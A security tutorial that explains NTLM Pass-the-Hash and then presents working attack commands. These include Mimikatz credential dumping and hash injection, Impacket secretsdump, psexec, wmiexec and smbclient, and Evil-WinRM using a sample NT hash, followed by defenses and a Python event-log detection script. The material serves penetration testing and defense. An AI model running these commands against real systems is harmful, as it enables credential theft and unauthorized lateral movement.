Pass-the-Hash (PtH) is one of the most effective lateral movement techniques in a Windows environment. Instead of cracking a captured password hash, an attacker simply reuses the hash itself to authenticate as the victim user. Windows NTLM authentication was designed to accept the hash as a credential equivalent — a design decision from the 1990s that continues to haunt enterprise networks today. Understanding how PtH works is essential for both offensive operators and defenders building detection strategies.
How NTLM Authentication Works
When a user logs into a Windows machine with a password, Windows computes an NT hash (MD4 of the UTF-16LE-encoded password), stores it in the Security Account Manager (SAM) database for local accounts, and keeps it in LSASS process memory for the duration of the logon session. When that user authenticates to a remote resource over NTLM, the protocol uses a challenge-response exchange in which the client proves knowledge of the NT hash; the plaintext password is never transmitted.
This means that if an attacker obtains the NT hash, they can impersonate that user to any service accepting NTLM authentication — no cracking required.
Dumping Hashes from LSASS
The most common hash source during an engagement is the LSASS process on a compromised machine. Tools like Mimikatz extract hashes directly from memory:
# Requires local admin or SYSTEM
privilege::debug
sekurlsa::logonpasswords
Output includes usernames and their NT hashes:
Username : jsmith
Domain : CORP
NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
The second part of the colon-separated string (8846f7eaee...) is the NT hash. The first part (aad3b435...) is the LM hash; this particular value is the LM hash of an empty password, which is what modern Windows stores because LM hashing is disabled by default.
Impacket’s secretsdump can dump hashes remotely if you have valid credentials:
python3 secretsdump.py CORP/jsmith:Password123@192.168.1.10
You can also dump hashes offline from a SAM and SYSTEM hive backup:
python3 secretsdump.py -sam SAM -system SYSTEM LOCAL
Once you have an NT hash, you can authenticate as that user without knowing the password.
Using Impacket’s psexec.py
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20
This opens an interactive SYSTEM shell on the target.
Using wmiexec.py
python3 wmiexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20 "whoami"
wmiexec is slightly stealthier than psexec because it doesn’t install a service or write a service binary to disk, although its command output is still staged in a temporary file on the target’s ADMIN$ share, which leaves its own artifact.
Using smbclient.py
python3 smbclient.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20
This gives you an SMB shell to browse and exfiltrate files.
Evil-WinRM
evil-winrm -i 192.168.1.20 -u Administrator \
-H 8846f7eaee8fb117ad06bdd830b7586c
Evil-WinRM uses WinRM over port 5985 and accepts NT hashes directly. It also supports PowerShell script upload and Kerberos authentication.
Mimikatz (Local)
On a Windows pivot machine, Mimikatz can inject a hash into a new logon session:
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
This spawns a cmd.exe process running in the context of the specified user, using the hash for outbound NTLM authentication.
Why Local Admin Hashes Are Dangerous
If an organization uses the same local administrator password on all machines (a common, terrible practice), capturing one NT hash gives you lateral movement to every machine in the network. This is the core danger of PtH combined with password reuse.
Microsoft LAPS (Local Administrator Password Solution) was created specifically to randomize local admin passwords per machine, breaking this attack path. Its successor, Windows LAPS (built into Windows Server 2022 and Windows 11 22H2), stores passwords in Active Directory with access controls.
Defending Against Pass-the-Hash
1. Enable Protected Users Security Group
Add privileged accounts to the Protected Users group in Active Directory. Members cannot authenticate using NTLM, only Kerberos, so PtH against those accounts is blocked outright. Note that the group covers domain accounts only (local administrator accounts are addressed by LAPS below), and the DC-side restrictions require a Windows Server 2012 R2 or later domain functional level.
Add-ADGroupMember -Identity "Protected Users" -Members "Administrator"
2. Disable NTLM Network Authentication
In environments that can support it, disable NTLMv1 and restrict NTLMv2 via Group Policy:
Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
- Set “Network security: LAN Manager authentication level” to “Send NTLMv2 response only. Refuse LM & NTLM”
- Consider blocking NTLM entirely for domain accounts via the “Network security: Restrict NTLM” settings; run them in audit mode first (“Audit NTLM authentication in this domain”) so legacy dependencies show up in the logs before anything breaks
3. Deploy Microsoft LAPS
Randomize local administrator passwords on every workstation and server. Without a common hash, lateral movement via PtH is dramatically limited.
4. Credential Guard
Windows Defender Credential Guard uses virtualization-based security (VBS) to isolate the credential-handling part of LSASS (LSAIso) in a secure container, so tools like Mimikatz cannot read domain credentials out of memory even when running as SYSTEM. It protects domain credentials held by LSASS; local account hashes in the SAM are not covered, which is one more reason to pair it with LAPS.
Enable via Group Policy: Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security (requires UEFI with Secure Boot and a CPU with virtualization extensions)
5. Privileged Access Workstations (PAWs)
Ensure domain admin credentials are only used from dedicated, hardened workstations. This limits where high-value hashes can be captured.
6. Detect with Event Logs
Monitor for:
- Event ID 4624 with Logon Type 3 (network) and Authentication Package = NTLM from unexpected sources, such as workstation-to-workstation traffic or hosts with no documented NTLM dependency
- Event ID 4625: failed logon attempts, especially the same account failing against many hosts in a short window (hash spraying)
- Event ID 7045 in the System log: new service installation (the psexec artifact; Sysinternals PsExec installs PSEXESVC, Impacket’s psexec.py a randomly named service)
Security tools like Microsoft Defender for Identity and Splunk can correlate these events and alert on PtH patterns automatically.
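A detection pass over the event types listed above, as an added example that is not part of the original post. The events are constructed samples (not real logs); the allowlist of legitimate NTLM sources, the 60-second logon-to-7045 correlation window and the spraying threshold are assumptions a real deployment would tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ev(eid, t, host, user, **extra):
    """Build a constructed event record (a subset of 4624/4625/7045 fields)."""
    return {"id": eid, "time": datetime.fromisoformat("2024-05-01T" + t), "host": host, "user": user, **extra}


# Constructed sample events, not real logs. 4624/4625 come from the Security log,
# 7045 (service installed) from the System log; the service name is a placeholder.
SAMPLE_EVENTS = [
    ev(4624, "10:00:05", "FS01", "Administrator", logon_type=3, auth_pkg="NTLM", src_ip="10.0.5.23"),
    ev(7045, "10:00:07", "FS01", "SYSTEM", service="placeholder-svc", image="%SystemRoot%\\placeholder-svc.exe"),
    ev(4624, "10:01:00", "FS01", "svc_backup", logon_type=3, auth_pkg="Kerberos", src_ip="10.0.1.10"),
    ev(4624, "10:02:00", "WS07", "jsmith", logon_type=3, auth_pkg="NTLM", src_ip="10.0.1.10"),
    ev(4625, "10:05:01", "WS08", "Administrator", logon_type=3, auth_pkg="NTLM", src_ip="10.0.5.23"),
    ev(4625, "10:05:02", "WS09", "Administrator", logon_type=3, auth_pkg="NTLM", src_ip="10.0.5.23"),
    ev(4625, "10:05:03", "WS10", "Administrator", logon_type=3, auth_pkg="NTLM", src_ip="10.0.5.23"),
]
KNOWN_NTLM_SOURCES = {"10.0.1.10"}  # assumed: hosts with a documented, legitimate NTLM dependency
SERVICE_WINDOW = timedelta(seconds=60)  # assumed correlation window between logon and 7045


def ntlm_network_logons(events, allowlist):
    """4624 with Logon Type 3 and Authentication Package NTLM from an unexpected source."""
    return [e for e in events if e["id"] == 4624 and e["logon_type"] == 3
            and e["auth_pkg"] == "NTLM" and e["src_ip"] not in allowlist]


def services_installed_after(events, logon, window):
    """7045 on the same host within `window` after the logon: the psexec service artifact."""
    return [e for e in events if e["id"] == 7045 and e["host"] == logon["host"]
            and timedelta(0) <= e["time"] - logon["time"] <= window]


def detect_pth(events, allowlist=KNOWN_NTLM_SOURCES, window=SERVICE_WINDOW):
    """One alert per suspicious NTLM network logon; severity rises if a service followed."""
    alerts = []
    for logon in ntlm_network_logons(events, allowlist):
        svc = services_installed_after(events, logon, window)
        alerts.append({"host": logon["host"], "user": logon["user"], "src_ip": logon["src_ip"],
                       "severity": "high" if svc else "medium",
                       "services": [s["service"] for s in svc]})
    return alerts


def failed_logon_bursts(events, threshold=3):
    """Source IPs whose NTLM 4625 failures hit at least `threshold` distinct hosts (spraying)."""
    hosts_by_src = defaultdict(set)
    for e in events:
        if e["id"] == 4625 and e.get("auth_pkg") == "NTLM":
            hosts_by_src[e["src_ip"]].add(e["host"])
    return {src: len(hosts) for src, hosts in hosts_by_src.items() if len(hosts) >= threshold}
```

The Kerberos logon and the allowlisted NTLM source produce no alert, while the NTLM logon followed two seconds later by a service install on the same host is rated high.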
Conclusion
Pass-the-Hash is a fundamental Windows lateral movement technique that works because NTLM was designed to treat the hash as the secret. For pentesters, mastering PtH tools like Impacket, Evil-WinRM, and Mimikatz is essential for demonstrating realistic attack paths in engagements. For defenders, the combination of Credential Guard, Protected Users, LAPS, and NTLM restrictions can reduce PtH exposure dramatically — even if you can’t eliminate NTLM entirely from your environment overnight.